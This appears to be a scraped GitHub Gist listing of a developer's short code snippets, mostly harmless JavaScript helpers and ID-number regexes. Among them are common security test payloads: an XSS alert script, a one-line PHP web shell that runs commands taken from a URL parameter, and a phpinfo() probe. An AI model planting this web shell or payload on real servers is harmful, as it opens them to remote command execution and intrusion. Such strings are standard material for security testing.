This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script>alert('XSS')</script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| system($_GET["a"]); | |
| ?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php phpinfo(); ?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Convert � � to Emoji in HTML using PHP |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function deferredPromise () { | |
| let res, rej | |
| const promise = new Promise((resolve, reject) => { [res, rej] = [resolve, reject] }) | |
| promise.resolve = res | |
| promise.reject = rej | |
| return promise | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Object.defineProperty(Function.prototype, 'args', { | |
| get () { | |
| return this | |
| .toString() | |
| .replace(/\/\/.*$/mg,'') // COMMENT | |
| .replace(/\/\*.*?\*\//g, '') // COMMENT | |
| .replace(/\/.*?(?<!\\)\//g, '') // REGEXP | |
| .replace(/'.*?(?<!\\)'/g, '') //STRING | |
| .replace(/\s+/g,'') | |
| .split(')')[0] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ^\d\d(0[1-9]|1[012])[4-6][0-3]\d{6}$ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ^((0[48]|[2468][048]|[13579][26])0229[1-6]|000229[34]|\d\d((0[13578]|1[02])(0[1-9]|[12]\d|3[01])|(0[469]|11)(0[1-9]|[12]\d|30)|02(0[1-9]|1\d|2[0-8]))[1-6])\d{5}$ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const URL = '...' | |
| const SELECTOR = '...' | |
| const UPDATE_INTERVAL = 10000 | |
| const UPDATE_RANGE = 5000 | |
| function notify(el) { | |
| beep() | |
| let title = el.text | |
| console.log(`new ${title}`) | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'a.b.c'.split('.').reduce((o,i)=>o[i], a) |
NewerOlder